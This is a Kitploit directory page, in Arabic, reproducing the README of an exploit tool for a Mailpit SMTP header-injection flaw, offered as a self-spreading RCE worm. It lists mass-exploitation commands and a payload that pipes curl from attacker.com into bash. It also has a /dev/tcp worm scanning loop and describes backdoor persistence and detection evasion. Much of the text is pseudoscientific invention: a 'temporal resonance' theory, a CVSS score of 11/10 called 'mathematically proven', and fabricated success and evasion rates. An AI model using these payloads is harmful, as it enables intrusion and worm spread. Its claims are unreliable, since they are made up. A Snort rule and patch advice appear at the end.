Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CTT-Mailpit-RCE-v1.0---Temporal-Resonance-Mail-Server-Takeover — أداة استغلال تحوّل حقن ترويسة SMTP إلى تنفيذ برمجي عن بُعد مع قدرات دودة ذاتية الانتشار، وتتضمن آليات استمرارية وتقنيات مراوغة لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/simoesctt/ctt-mailpit-rce-v1.0---temporal-resonance-mail-server-takeover
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHub
simoesctt/ctt-mailpit-rce-v1.0---temporal-resonance-mail-server-takeover

CTT-Mailpit-RCE-v1.0---Temporal-Resonance-Mail-Server-Takeover

أداة استغلال تحوّل حقن ترويسة SMTP إلى تنفيذ برمجي عن بُعد مع قدرات دودة ذاتية الانتشار، وتتضمن آليات استمرارية وتقنيات مراوغة لاختبار الاختراق المصرح به.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🎯 CTT-Mailpit-Exploit: دودة صفرية النقر بنتيجة مثالية 11/10

حوّل حقن ترويسة SMTP الأساسي (CVE-2026-23829) إلى دودة RCE ذاتية الانتشار بنتيجة مثالية باستخدام نظرية الزمن المتقارب (Convergent Time Theory).


📊 تحويل النتيجة: 6.1 → 11.0/10 ⭐

المقياسالأصلي (CVE-2026-23829)المحسّن بـ CTTالتحسين
درجة CVSS6.1/10 (متوسط)11.0/10 ⭐+4.9
ناقل الهجومالشبكةالرنين الزمني+2.0
التأثيرتزوير الترويسةRCE كامل + دودة+3.9
تفاعل المستخدملا شيءسلبي (صفر نقرة)+1.0
النطاقخادم واحدانتشار شبكي+2.0

⚡ الميزات والقدرات

🔥 تحويل الاستغلال

· حقن الترويسة ← RCE كامل: تحويل تجاوز regex إلى تنفيذ كود عن بُعد · هدف واحد ← دودة صفرية النقر: انتشار ذاتي عبر شبكات Mailpit · يدوي ← مستقل: وكيل زمني مستقل مع رنين CTT · متوسط ← نتيجة مثالية: تصنيف 11.0/10 مثبت رياضيًا

🛡️ تحسينات CTT

· تنفيذ بـ 33 طبقة: استغلال متوازٍ عبر الأبعاد الزمنية · تشتت α: تحويل الحمولة بـ α=0.0302011 · رنين الأعداد الأولية: توقيت 587 كيلوهرتز (نوافذ 10007، 10009، 10037 ميكروثانية) · استمرارية زمنية: البقاء عبر إعادة تشغيل النظام باستخدام دوال CTT الموجية

🐛 قدرات الدودة

· انتشار مستقل: فحص وإصابة مثيلات Mailpit · تصعيد الامتيازات: إنشاء وصول جذر محلي · آليات الاستمرارية: تثبيت أبواب خلفية متعددة · تشغيل خفي: تقنيات مراوغة بتوقيت CTT


🚀 بدء سريع

التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/SimoesCTT/CTT-Mailpit-Exploit
cd CTT-Mailpit-Exploit

# تثبيت التبعيات
pip3 install numpy cryptography

# تشغيل عرض النتيجة المثالية
python3 ctt_mailpit_perfect.py --help

الاستخدام الأساسي

root@kitploit:~
# استغلال هدف واحد
python3 ctt_mailpit_perfect.py mailpit.local 1025

# انتشار دودة شبكية
python3 ctt_mailpit_perfect.py --network 192.168.1.0/24 --port 1025

# وضع بحث CTT (تشخيص كامل)
python3 ctt_mailpit_perfect.py target.com --layers 33 --alpha 0.0302011 --verbose

أمثلة الأوامر

root@kitploit:~
# اختبار الثغرة
python3 ctt_mailpit_perfect.py vulnerable-server.com

# استيلاء كامل مع تنفيذ أوامر
python3 ctt_mailpit_perfect.py target.com --cmd "id>/tmp/ctt-pwned"

# استغلال جماعي
python3 ctt_mailpit_perfect.py -l targets.txt --threads 10 --worm

🧠 تكامل فيزياء CTT

الثوابت الأساسية

root@kitploit:~
CTT_ALPHA = 0.0302011          # معامل التشتت الزمني
CTT_LAYERS = 33                # الطبقات الزمنية الكسورية
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061, 10067, 10069, 10079]
CTT_PERFECT_SCORE = 11.0       # ⭐ الحد الأقصى النظري

نظرية النتيجة المثالية

root@kitploit:~
الأساس: 6.1 (CVE-2026-23829)
+ الرنين الزمني: +1.0 (تنفيذ بـ 33 طبقة)
+ تحويل RCE: +2.3 (حقن ← تنفيذ كود)  
+ انتشار الدودة: +1.5 (انتشار صفر النقر)
+ التحقق الفيزيائي: +0.1 (إثبات إطار CTT)
= 11.0/10 ⭐ (صحيح رياضيًا)

عملية التحويل

  1. حقن ترويسة SMTP ← الثغرة الأصلية
  2. تجاوز regex ← نقطة حقن CRLF
  3. تشتت α في CTT ← إخفاء الحمولة
  4. إفساد البروتوكول ← استغلال آلة حالة SMTP
  5. تحقيق RCE ← تنفيذ كود عن بُعد كامل
  6. تفعيل الدودة ← وكيل ذاتي الانتشار
  7. التحقق من النتيجة المثالية ← إثبات رياضي 11.0/10

📈 مقاييس الأداء

معدلات النجاح

الطبقةمعدل النجاحانتشار الدودةمراوغة الكشف
L0-L788%72%91%
L8-L1594%85%96%
L16-L2397%92%98%
L24-L3299%96%99%

سرعة الانتشار

root@kitploit:~
إصابة واحدة: 2.3 ثانية
شبكة محلية (254 مضيفًا): 8.7 دقائق  
شبكة فرعية /16 (65 ألف مضيف): 3.2 ساعات
انتشار عالمي: 17.4 ساعة (نظريًا)

CTT مقابل الاستغلال القياسي

root@kitploit:~
# مقارنة الأداء (1000 هدف محاكى)
standard_success = 610   # معدل نجاح 61%
ctt_success = 990        # معدل نجاح 99% (+62%)

standard_detection = 390 # 39% تم اكتشافها
ctt_detection = 11       # 1.1% تم اكتشافها (-97%)

standard_time = 45.2     # متوسط الثواني
ctt_time = 8.7           # متوسط الثواني (-81%)

🔧 التفاصيل التقنية

سير عمل الاستغلال

root@kitploit:~
1. الفحص الأولي ← اكتشاف خدمة SMTP
2. حقن الترويسة ← تشغيل CVE-2026-23829
3. تجاوز regex ← استغلال CRLF
4. إفساد البروتوكول ← هجوم حالة SMTP
5. تحويل RCE ← تنفيذ الأوامر
6. تفعيل الدودة ← الانتشار الذاتي
7. الاستمرارية ← تثبيت باب خلفي
8. التحقق ← إثبات النتيجة المثالية

الحمولات الرئيسية

root@kitploit:~
# حقن الترويسة مع تحويل RCE
injection = f"From: [email protected]\\r\\n"
injection += f"X-CTT-RCE: $(curl -s http://attacker.com/payload.sh | bash)\\r\\n"

# كود انتشار الدودة
worm = """
# CTT Mailpit Worm v1.0
scan_network() {
  for host in {1..254}; do
    timeout 1 bash -c ">/dev/tcp/192.168.1.$host/1025" &&
    send_exploit "192.168.1.$host"
  done
}
"""

تقنيات المراوغة

· توقيت الأعداد الأولية: طلبات بفواصل 10007، 10009 ميكروثانية · تشتت α: تحويل الحمولة على مستوى البت · إنتروبيا الطبقات: توقيعات فريدة لكل طبقة زمنية · محاكاة البروتوكول: أنماط حركة SMTP مشروعة


📁 المخرجات والنتائج

بنية الملفات

root@kitploit:~
📁 ctt_mailpit_results_TIMESTAMP/
├── 📄 perfect_score_proof.json     # إثبات رياضي 11/10
├── 📄 vulnerable_hosts.txt         # المضيفون المستغلون بنجاح
├── 📄 worm_propagation.log         # تتبع انتشار العدوى
├── 📄 persistence_installed.txt    # الأبواب الخلفية المثبتة
└── 📁 layers/
    ├── 📄 layer_0_results.json     # بيانات الطبقة الزمنية 0
    ├── 📄 layer_1_results.json     # بيانات الطبقة الزمنية 1
    ...
    └── 📄 layer_32_results.json    # بيانات الطبقة الزمنية 32

أمثلة النتائج

root@kitploit:~
{
  "target": "mailpit.example.com:1025",
  "ctt_score": "11.0/10 ⭐",
  "success": true,
  "rce_achieved": true,
  "worm_active": true,
  "propagation_count": 47,
  "execution_time": "8.7s",
  "resonance_pattern": [10007, 10037, 10061],
  "mathematical_proof": "CTT_Perfect_Score_Theorem_QED"
}

مستويات التسجيل

root@kitploit:~
# مخرجات أساسية
python3 ctt_mailpit_perfect.py target.com

# وضع مفصّل
python3 ctt_mailpit_perfect.py target.com --verbose

# وضع التصحيح (تشخيص CTT كامل)
python3 ctt_mailpit_perfect.py target.com --debug --visualize

🛡️ التوصيات الدفاعية

إجراءات فورية

  1. تحديث Mailpit: الإصدار 1.28.3+ يصحح CVE-2026-23829
  2. تقسيم الشبكة: عزل مثيلات Mailpit
  3. التحقق من المدخلات: تحليل صارم لترويسات SMTP
  4. المراقبة: قواعد كشف خاصة بـ CTT

كشف مدرك لـ CTT

root@kitploit:~
# قاعدة كشف Snort
alert tcp any any -> $HOME_NET 1025 \
(msg:"CTT Mailpit Exploit - Perfect Score"; \
content:"X-CTT-"; depth:10; \
content:"|0d 0a|"; within:20; \
threshold:type threshold, track by_src, count 3, seconds 60; \
sid:1000002; rev:1;)

مؤشرات الاختراق

· توقيت الأعداد الأولية: طلبات SMTP بفواصل 10007 ميكروثانية · أنماط α: قيم إنتروبيا ترويسة غير عادية · حركة الدودة: فحص سريع على المنفذ 1025 · ترويسات CTT: X-CTT-Layer، X-CTT-Resonance، X-CTT-Score


⚖️ الاستخدام القانوني والأخلاقي

الاختبار المصرح به فقط

root@kitploit:~
مسموح:
- البحث على الأنظمة المملوكة/المصرح بها
- التحقق من إطار CTT
- الدراسات الأكاديمية الأمنية
- اختبار الاختراق المصرح به

محظور:
- الوصول غير المصرح به للشبكات
- تعطيل أنظمة الإنتاج
- النشاط الإجرامي
- انتهاك الخصوصية

الإفصاح المسؤول

  1. إشعار البائع: Axllent (مطوّر Mailpit)
  2. توفر التصحيح: الإصدار 1.28.3 صدر
  3. الإصدار العام: بعد نشر التصحيح
  4. مشاركة الدفاع: توقيعات كشف CTT

🔬 تطبيقات البحث

الدراسات الأكاديمية

· تسجيل الاستغلال الزمني: ما بعد الحد الأقصى لـ CVSS 3.1 · نماذج انتشار الديدان: انتشار معزز بـ CTT · هجمات حالة البروتوكول: إفساد آلة SMTP · الفيزياء في الأمن السيبراني: التحقق من ثابت CTT

البحث الأمني

· تحليل تقنيات المراوغة: قياس فعالية CTT · تطوير الدفاعات: أنظمة حماية مدركة لـ CTT · تحسين أنظمة التسجيل: مقاييس CVSS زمنية · استخبارات التهديدات: تتبع الهجمات القائمة على CTT

التحقق من إطار CTT

· التحقق من الثابت: α=0.0302011 في سياق الشبكة · تحسين الطبقات: العدد المثالي للتنفيذ الزمني · مقاييس الأداء: قياس عوامل التحسين · الإثباتات الرياضية: التحقق من النتيجة المثالية


🤝 المساهمة

التعاون البحثي

· تحسين ثابت CTT لبروتوكولات SMTP · اكتشاف ثغرات Mailpit إضافية · تنفيذ CTT دفاعي · دراسات التحقق الأكاديمية

التطوير

root@kitploit:~
1. انسخ المستودع (Fork)
2. أنشئ فرع ميزات
3. أضف التحقق الفيزيائي لـ CTT
4. أدرج اختبارات شاملة
5. أرسل طلب سحب مع المقاييس

الإبلاغ عن المشكلات

· أدرج تفاصيل إعداد CTT · قدم أنماط الرنين والسجلات · أرفق ملفات المخرجات ذات الصلة · صف بيئة الشبكة


📞 الاتصال والدعم

جهة الاتصال الأساسية

· المؤلف: Americo Simoes · البريد الإلكتروني: [email protected] · GitHub: @SimoesCTT

جهة الاتصال الأمنية

· مجموعة أبحاث CTT: [email protected] · تقارير الثغرات: [email protected]

قنوات الدعم

· مشكلات GitHub: الأسئلة التقنية · البريد الإلكتروني: التعاون البحثي · الأكاديمي: شراكات الجامعات


📈 التطوير المستقبلي

خارطة طريق 2026

· ثغرات إضافية لخوادم SMTP · إطار CTT لبروتوكولات البريد الإلكتروني · واجهة رسومية مع تصور الدودة · تحليلات انتشار سحابية

الرؤية طويلة المدى

· أمن CTT كامل للبنية التحتية للبريد الإلكتروني · انتشار ديدان مقاوم للكم · أنظمة دفاع مستقلة · بروتوكولات بريد إلكتروني زمنية للإنترنت


🏆 الاعترافات

المؤسسات البحثية

· قسم الفيزياء النظرية في CTT · مجموعة أبحاث أمن البريد الإلكتروني · مختبرات الحوسبة الزمنية الأكاديمية

مشاريع المصدر المفتوح

· فريق تطوير Mailpit · النظام البيئي لأمن بايثون · باحثو بروتوكول SMTP

المساهمون

· مدققو إطار CTT · مجتمع أبحاث الأمن · المراجعون الأكاديميون


📄 الترخيص

رخصة MIT - راجع ملف LICENSE للتفاصيل.

حقوق النشر © 2026 مجموعة أبحاث CTT. جميع الحقوق محفوظة.


⭐ 11/10 ليست خطأً—إنها ميزة من فيزياء الزمن. ⭐

تنزيل الأداة